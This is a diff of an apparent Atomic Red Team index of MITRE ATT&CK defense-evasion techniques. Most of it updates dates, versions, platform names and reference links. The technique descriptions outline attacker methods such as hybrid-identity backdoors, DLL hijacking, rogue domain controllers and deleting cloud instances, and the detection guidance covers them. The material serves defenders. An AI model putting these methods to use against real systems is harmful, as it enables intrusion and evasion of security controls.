       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
         access to accounts.  \n\nMany organizations maintain hybrid user and device
         identities that are shared between on-premises and cloud-based environments.
-        These can be maintained in a number of ways. For example, Azure AD includes
-        three options for synchronizing identities between Active Directory and Azure
-        AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+        These can be maintained in a number of ways. For example, Microsoft Entra
+        ID includes three options for synchronizing identities between Active Directory
+        and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
         (PHS), in which a privileged on-premises account synchronizes user password
-        hashes between Active Directory and Azure AD, allowing authentication to Azure
-        AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
-        in which Azure AD authentication attempts are forwarded to an on-premises
+        hashes between Active Directory and Entra ID, allowing authentication to Entra
+        ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+        in which Entra ID authentication attempts are forwarded to an on-premises
         PTA agent, which validates the credentials against Active Directory \n* Active
         Directory Federation Services (AD FS), in which a trust relationship is established
-        between Active Directory and Azure AD \n\nAD FS can also be used with other
+        between Active Directory and Entra ID \n\nAD FS can also be used with other
         SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
         process to AD FS and receive a token containing the hybrid users’ identity
         and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
         an adversary may be able to establish persistent privileged access to cloud
         resources. For example, adversaries who compromise an on-premises server running
         a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
-        process that authorizes all attempts to authenticate to Azure AD, as well
+        process that authorizes all attempts to authenticate to Entra ID, as well
         as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
         AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary
         may edit the `Microsoft.IdentityServer.Servicehost` configuration file to
@@ -4905,9 +5049,9 @@ defense-evasion:
         any set of claims, thereby bypassing multi-factor authentication and defined
         AD FS policies.(Citation: MagicWeb)\n\nIn some cases, adversaries may be able
         to modify the hybrid identity authentication process from the cloud. For example,
-        adversaries who compromise a Global Administrator account in an Azure AD tenant
+        adversaries who compromise a Global Administrator account in an Entra ID tenant
         may be able to register a new PTA agent via the web console, similarly allowing
-        them to harvest credentials and log into the Azure AD environment as any user.(Citation:
+        them to harvest credentials and log into the Entra ID environment as any user.(Citation:
         Mandiant Azure AD Backdoors)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
@@ -4916,21 +5060,22 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
       - SaaS
-      - Google Workspace
-      - Office 365
       - IaaS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Praetorian
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Module: Module Load'
@@ -4970,9 +5115,6 @@ defense-evasion:
         url: https://www.mandiant.com/resources/detecting-microsoft-365-azure-active-directory-backdoors
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218.015:
     technique:
@@ -5035,7 +5177,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.012:
     technique:
@@ -5095,7 +5236,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.012
     atomic_tests: []
   T1207:
@@ -5136,7 +5276,7 @@ defense-evasion:
         description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
           Retrieved March 30, 2018.
         source_name: ADDSecurity DCShadow Feb 2018
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-08T21:20:04.850Z'
       name: Rogue Domain Controller
       description: |-
         Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
@@ -5167,8 +5307,6 @@ defense-evasion:
       x_mitre_permissions_required:
       - Administrator
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1207
     atomic_tests: []
   T1553.006:
@@ -5258,7 +5396,7 @@ defense-evasion:
         Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
         vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
         Driver Loader)"
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T05:00:03.480Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: Code Signing Policy Modification'
       x_mitre_detection: 'Monitor processes and command-line arguments for actions
@@ -5282,12 +5420,11 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.006
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -5366,7 +5503,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests:
     - name: Deploy Docker container
@@ -5485,12 +5621,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1112
     atomic_tests: []
   T1574.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T15:25:57.059Z'
       name: 'Hijack Execution Flow: Path Interception by Search Order Hijacking'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
@@ -5509,6 +5644,7 @@ defense-evasion:
         phase_name: defense-evasion
       x_mitre_contributors:
       - Stefan Kanthak
+      x_mitre_deprecated: false
       x_mitre_detection: |
         Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
 
@@ -5516,7 +5652,6 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       x_mitre_version: '1.0'
@@ -5536,29 +5671,31 @@ defense-evasion:
       id: attack-pattern--58af3705-8740-4c68-9329-ec015a7013c2
       created: '2020-03-13T17:48:58.999Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1574/008
         external_id: T1574.008
+      - source_name: Microsoft Environment Property
+        description: Microsoft. (2011, October 24). Environment Property. Retrieved
+          July 27, 2016.
+        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
+      - source_name: Microsoft WinExec
+        description: Microsoft. (n.d.). WinExec function. Retrieved September 12,
+          2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-winexec
       - source_name: Windows NT Command Shell
         description: Tim Hill. (2014, February 2). The Windows NT Command Shell. Retrieved
           December 5, 2014.
         url: https://docs.microsoft.com/en-us/previous-versions//cc723564(v=technet.10)?redirectedfrom=MSDN#XSLTsection127121120120
-      - source_name: Microsoft WinExec
-        description: Microsoft. (n.d.). WinExec function. Retrieved December 5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms687393
-      - source_name: Microsoft Environment Property
-        description: Microsoft. (2011, October 24). Environment Property. Retrieved
-          July 27, 2016.
-        url: https://docs.microsoft.com/en-us/previous-versions//fd7hxfdd(v=vs.85)?redirectedfrom=MSDN
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1574.008
     atomic_tests: []
   T1535:
@@ -5609,7 +5746,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1027.001:
     technique:
@@ -5676,12 +5812,11 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1027.001
     atomic_tests: []
   T1484.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-23T22:11:01.884Z'
       name: 'Domain Policy Modification: Group Policy Modification'
       description: "Adversaries may modify Group Policy Objects (GPOs) to subvert
         the intended discretionary access controls for a domain, usually with the
@@ -5717,6 +5852,10 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Itamar Mizrahi, Cymptom
+      - Tristan Bennett, Seamless Intelligence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
 
@@ -5728,16 +5867,12 @@ defense-evasion:
 
 
         GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).
-      x_mitre_platforms:
-      - Windows
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
       x_mitre_domains:
       - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
       x_mitre_version: '1.0'
-      x_mitre_contributors:
-      - Itamar Mizrahi, Cymptom
-      - Tristan Bennett, Seamless Intelligence
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Active Directory: Active Directory Object Creation'
@@ -5773,12 +5908,12 @@ defense-evasion:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Harmj0y SeEnableDelegationPrivilege Right
         description: Schroeder, W. (2017, January 10). The Most Dangerous User Right
-          You (Probably) Have Never Heard Of. Retrieved March 5, 2019.
-        url: http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
+          You (Probably) Have Never Heard Of. Retrieved September 23, 2024.
+        url: https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
       - source_name: TechNet Group Policy Basics
         description: 'srachui. (2012, February 13). Group Policy Basics – Part 1:
           Understanding the Structure of a Group Policy Object. Retrieved March 5,
@@ -5786,14 +5921,13 @@ defense-evasion:
         url: https://blogs.technet.microsoft.com/musings_of_a_technical_tam/2012/02/13/group-policy-basics-part-1-understanding-the-structure-of-a-group-policy-object/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1484.001
     atomic_tests: []
   T1078.001:
     technique:
-      modified: '2024-03-07T14:27:04.770Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Default Accounts'
       description: |-
         Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.(Citation: Microsoft Local Accounts Feb 2019)(Citation: AWS Root User)(Citation: Threat Matrix for Kubernetes)
@@ -5808,6 +5942,7 @@ defense-evasion:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: Monitor whether default accounts have been activated or logged
         into. These audits should also include checks on any appliances and applications
@@ -5816,18 +5951,18 @@ defense-evasion:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -5859,14 +5994,11 @@ defense-evasion:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.001
     atomic_tests: []
   T1574.006:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:40.146Z'
       name: 'Hijack Execution Flow: LD_PRELOAD'
       description: "Adversaries may execute their own malicious payloads by hijacking
         environment variables the dynamic linker uses to load shared libraries. During
@@ -5987,7 +6119,6 @@ defense-evasion:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
       identifier: T1574.006
     atomic_tests: []
   T1070.001:
@@ -6061,12 +6192,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.001
     atomic_tests: []
   T1222:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T17:54:06.038Z'
       name: File and Directory Permissions Modification
       description: "Adversaries may modify file or directory permissions/attributes
         to evade access control lists (ACLs) and access protected files.(Citation:
@@ -6163,12 +6293,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1222
     atomic_tests: []
   T1548:
     technique:
-      modified: '2024-04-15T20:52:09.908Z'
+      modified: '2024-10-15T15:32:21.811Z'
       name: Abuse Elevation Control Mechanism
       description: 'Adversaries may circumvent mechanisms designed to control elevate
         privileges to gain higher-level permissions. Most modern systems contain native
@@ -6200,11 +6329,10 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
       - IaaS
-      - Google Workspace
-      - Azure AD
-      x_mitre_version: '1.3'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'User Account: User Account Modification'
@@ -6245,11 +6373,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1134.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-11T21:14:37.714Z'
       name: Create Process with Token
       description: |-
         Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)
@@ -6305,12 +6432,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1134.002
     atomic_tests: []
   T1548.001:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-15T18:43:20.995Z'
       name: 'Abuse Elevation Control Mechanism: Setuid and Setgid'
       description: |-
         An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
@@ -6367,7 +6493,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1548.001
     atomic_tests: []
   T1218.008:
@@ -6403,7 +6528,7 @@ defense-evasion:
         description: 'Giagone, R., Bermejo, L., and Yarochkin, F. (2017, November
           20). Cobalt Strikes Again: Spam Runs Use Macros and CVE-2017-8759 Exploit
           Against Russian Banks. Retrieved March 7, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:52:49.877Z'
       name: 'Signed Binary Proxy Execution: Odbcconf'
       description: "Adversaries may abuse odbcconf.exe to proxy execution of malicious
         payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
@@ -6436,13 +6561,11 @@ defense-evasion:
       - Application control
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.008
     atomic_tests: []
   T1548.005:
     technique:
-      modified: '2024-03-28T15:30:09.313Z'
+      modified: '2024-10-15T16:07:49.519Z'
       name: Temporary Elevated Cloud Access
       description: "Adversaries may abuse permission configurations that allow them
         to gain temporarily elevated access to cloud resources. Many cloud environments
@@ -6504,10 +6627,9 @@ defense-evasion:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'User Account: User Account Modification'
       type: attack-pattern
@@ -6565,7 +6687,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.013:
     technique:
@@ -6607,7 +6728,7 @@ defense-evasion:
         description: Microsoft. (n.d.). PsSetCreateProcessNotifyRoutine routine. Retrieved
           December 20, 2017.
         source_name: Microsoft PsSetCreateProcessNotifyRoutine routine
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:43:48.848Z'
       name: Process Doppelgänging
       description: "Adversaries may inject malicious code into process via process
         doppelgänging in order to evade process-based defenses as well as possibly
@@ -6666,41 +6787,10 @@ defense-evasion:
       - Administrator
       - SYSTEM
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1578.003:
     technique:
-      x_mitre_platforms:
-      - IaaS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
-      type: attack-pattern
-      created: '2020-06-16T17:23:06.508Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1578.003
-        url: https://attack.mitre.org/techniques/T1578/003
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      - source_name: AWS CloudTrail Search
-        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
-        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
-          Retrieved June 17, 2020.
-      - source_name: Azure Activity Logs
-        url: https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/view-activity-logs
-        description: Microsoft. (n.d.). View Azure activity logs. Retrieved June 17,
-          2020.
-      - source_name: Cloud Audit Logs
-        url: https://cloud.google.com/logging/docs/audit#admin-activity
-        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.415Z'
       name: Delete Cloud Instance
       description: |-
         An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence.  Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.
@@ -6709,20 +6799,50 @@ defense-evasion:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         The deletion of a new instance or virtual machine is a common part of operations within many cloud environments. Events should then not be viewed in isolation, but as part of a chain of behavior that could lead to other activities. For example, detecting a sequence of events such as the creation of an instance, mounting of a snapshot to that instance, and deletion of that instance by a new user account may indicate suspicious activity.
 
         In AWS, CloudTrail logs capture the deletion of an instance in the <code>TerminateInstances</code> event, and in Azure the deletion of a VM may be captured in Azure activity logs.(Citation: AWS CloudTrail Search)(Citation: Azure Activity Logs) Google's Admin Activity audit logs within their Cloud Audit logs can be used to detect the usage of <code>gcloud compute instances delete</code> to delete a VM.(Citation: Cloud Audit Logs)
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - IaaS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Instance: Instance Metadata'
       - 'Instance: Instance Deletion'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--70857657-bd0b-4695-ad3e-b13f92cac1b4
+      created: '2020-06-16T17:23:06.508Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1578/003
+        external_id: T1578.003
+      - source_name: AWS CloudTrail Search
+        description: Amazon. (n.d.). Search CloudTrail logs for API calls to EC2 Instances.
+          Retrieved June 17, 2020.
+        url: https://aws.amazon.com/premiumsupport/knowledge-center/cloudtrail-search-api-calls/
+      - source_name: Cloud Audit Logs
+        description: Google. (n.d.). Audit Logs. Retrieved June 1, 2020.
+        url: https://cloud.google.com/logging/docs/audit#admin-activity
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      - source_name: Azure Activity Logs
